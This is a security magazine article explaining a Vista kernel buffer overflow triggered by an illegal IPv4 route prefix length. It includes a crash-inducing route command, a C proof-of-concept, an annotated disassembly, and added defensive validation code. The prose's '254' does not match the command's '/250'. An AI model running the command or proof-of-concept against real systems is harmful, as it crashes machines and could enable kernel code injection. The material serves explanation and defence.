Cyberwarfare Magazine

Warfare in the Information Age

Attacking the Vista Kernel

CNet reported not long ago on a new vulnerability found in the kernel of Vista[1]. The attack is a buffer overflow which corrupts kernel memory, and thus could be used for denial of service attacks. The report from Phion, the security company that reported the vulnerability, also states that the attack could be used to inject code[2].

The buffer overflow is triggered by adding a route with an illegal subnet bits (prefix length) value to the IPv4 routing table. For example, the following command will make Vista crash with a blue screen of death:

C:>route add 127.0.0.1/250 127.0.0.2

In the command above, we specified 254 as the number of subnet bits, which is an illegal value for an IPv4 address. According to the vulnerability report by Thomas Unterleitner, the greater the value, the quicker the crash is provoked[3].

The overflow is reached through the CreateIpForwardEntry2 function, which is part of the IP Helper library (Iphlpapi.dll). The problem arises because the function doesn’t verify the value of the PrefixLength member of the DestinationPrefix in the MIB_IPFORWARD_ROW2 structure passed to it. Therefore, the following code should crash the kernel[4]:

    /* Build with the Windows SDK; link against iphlpapi.lib and ws2_32.lib. */
    #define _WIN32_WINNT 0x0600
    #define WIN32_LEAN_AND_MEAN

    #include <windows.h>
    #include <winsock2.h>
    #include <ws2ipdef.h>
    #include <iphlpapi.h>

    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char** argv)
    {
        DWORD              dwStatus;
        MIB_IPFORWARD_ROW2 route;

        if (argc != 3)
        {
            printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
            return -1;
        }

        /* Zero the row and fill in the documented defaults */
        InitializeIpForwardEntry(&route);

        route.InterfaceIndex = atoi(argv[1]);
        route.DestinationPrefix.Prefix.si_family = AF_INET;

        route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");
        route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;

        /* The unchecked value: anything above 32 is illegal for an IPv4 prefix */
        route.DestinationPrefix.PrefixLength = atoi(argv[2]);

        route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
        route.NextHop.Ipv4.sin_family      = AF_INET;

        route.SitePrefixLength = 0;

        route.Protocol          = MIB_IPPROTO_NETMGMT;
        route.Origin            = NlroManual;
        route.ValidLifetime     = 0xffffffff;
        route.PreferredLifetime = 0xffffffff;
        route.Metric            = 1;

        /* The row is handed to the kernel, which copies the prefix without validating its length */
        dwStatus = CreateIpForwardEntry2(&route);
        return dwStatus;
    }

In order for this code to work you must be in the Administrators group or in the Network Operators group…so it’s of limited use for most people, but you never know…

The following annotated disassembly of NETIO!PtpCopyPartialKeys shows where the unchecked copy happens: the prefix length in bits is rounded up to bytes and passed straight to memcpy as the copy size.

NETIO!PtpCopyPartialKeys:
mov     edi,edi
push    ebp
mov     ebp,esp
movzx   eax,word ptr [ebp+10h]   ; = 0x00ee  PrefixLength in bits
add     eax,7
shr     eax,3
push    eax                      ; 0x0000001e PrefixLength in bytes
push    dword ptr [ebp+0Ch]      ; 0x934b7ac4 src buffer
push    dword ptr [ebp+8]        ; 0x83716398 dst buffer
; 83716398  00 00 00 00 00 00 00 00-05 00 06 04 45 76 65 ee
; 837163a8  01 00 00 00 01 00 00 00-78 81 15 83 00 00 00 00
; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; ------------------------------------------------------------------
call    NETIO!memcpy
; memcpy(0x83716398, 0x934b7ac4, 0x0000001e) // BUFFER OVERFLOW!!!!
; ------------------------------------------------------------------
; 83716398  01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93
; 837163a8  78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 00 00
; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; compare the byte values with the src buffer printed before

add     esp,0Ch
pop     ebp
ret     0Ch
neg     ecx
push    ecx
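The listing above makes the root cause concrete: the copy length is computed as (PrefixLength + 7) >> 3, so the 0xee (238) bits from the PoC become 0x1e (30) bytes written into a key that only holds a 4-byte IPv4 address, and nothing before the memcpy checks that PrefixLength fits the address family. The following is an added example, not code from the advisory or from Windows: it reproduces that arithmetic in plain C and shows the validation the kernel path was missing, which also covers the route command discussed earlier (a /250 prefix is rejected before any copy). The enum values, function names and the 4/16-byte key sizes are constructed for the illustration and are not the NETIO or IP Helper definitions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed family selectors (not the Windows AF_* values); they only
 * pick the key width for this example. */
enum key_family { KEY_FAMILY_IPV4 = 4, KEY_FAMILY_IPV6 = 6 };

/* Largest legal prefix length for each family, in bits. */
static unsigned max_prefix_bits(enum key_family family)
{
    return family == KEY_FAMILY_IPV4 ? 32u : 128u;
}

/* Same arithmetic as the PtpCopyPartialKeys listing: bytes = (bits + 7) >> 3.
 * For 0xee (238) bits this yields 0x1e (30), far beyond a 4-byte IPv4 key. */
static unsigned partial_key_bytes(unsigned prefix_bits)
{
    return (prefix_bits + 7u) >> 3;
}

/* The check the kernel path lacked: a prefix length must not exceed the
 * address width of its family. Returns 1 when the value is acceptable. */
static int prefix_length_is_valid(enum key_family family, unsigned prefix_bits)
{
    return prefix_bits <= max_prefix_bits(family);
}

/* Hardened copy of a partial routing key. dst_size and src_size are the real
 * buffer sizes. The copy is refused (returns 0) when the prefix length is
 * illegal for the family or the derived byte count would not fit either
 * buffer; otherwise the number of bytes copied is returned. */
static unsigned copy_partial_key(uint8_t *dst, size_t dst_size,
                                 const uint8_t *src, size_t src_size,
                                 enum key_family family, unsigned prefix_bits)
{
    unsigned n;

    if (!prefix_length_is_valid(family, prefix_bits))
        return 0;                        /* the /250 and 0xee cases end here */

    n = partial_key_bytes(prefix_bits);
    if (n > dst_size || n > src_size)
        return 0;                        /* honour the real buffer sizes too */

    memcpy(dst, src, n);
    return n;
}

int main(void)
{
    /* Constructed sample: the PoC's destination prefix 1.2.3.0 as a /24 */
    const uint8_t prefix[4] = { 1, 2, 3, 0 };
    uint8_t key[4] = { 0 };
    unsigned copied;

    copied = copy_partial_key(key, sizeof key, prefix, sizeof prefix,
                              KEY_FAMILY_IPV4, 24);
    printf("/24  -> copied %u bytes: %u.%u.%u.%u\n",
           copied, key[0], key[1], key[2], key[3]);

    /* The illegal value from the route command: rejected, nothing written */
    copied = copy_partial_key(key, sizeof key, prefix, sizeof prefix,
                              KEY_FAMILY_IPV4, 250);
    printf("/250 -> copied %u bytes (rejected)\n", copied);

    printf("unchecked arithmetic would copy %u bytes for 0xee bits into a 4-byte key\n",
           partial_key_bytes(0xee));
    return 0;
}
```

The two guards are deliberately separate: the family check rejects the value the caller supplied, while the size check defends the copy itself in case a caller ever passes a buffer smaller than the family's full address. Either one would have stopped the overflow shown in the listing; together they also make the function safe for IPv6 keys, where the legal range is 0 to 128 bits.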

Microsoft said it had no intention of patching this buffer overflow before the next Vista service pack[5]. This exploit doesn’t apply to Windows XP.


[1] “Kernel vulnerability found in Vista”, David Meyer, CNet Security, November 22, 2008, http://news.cnet.com/8301-1009_3-10106173-83.html?part=rss&subj=news&tag=2547-1_3-0-20 (accessed on November 25, 2008)

[2] “Microsoft VISTA TCP/IP stack buffer overflow”, Thomas Unterleitner, November 19, 2008, http://www.securityfocus.com/archive/1/498471 (accessed on November 25, 2008)

[3] Ibid.

[4] Ibid. Code by Thomas Unterleitner

[5] “Vista kernel is vulnerable”, Egan Orion, The Inquirer, November 24, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/11/24/vista-kernel-vulnerable (accessed on November 25, 2008)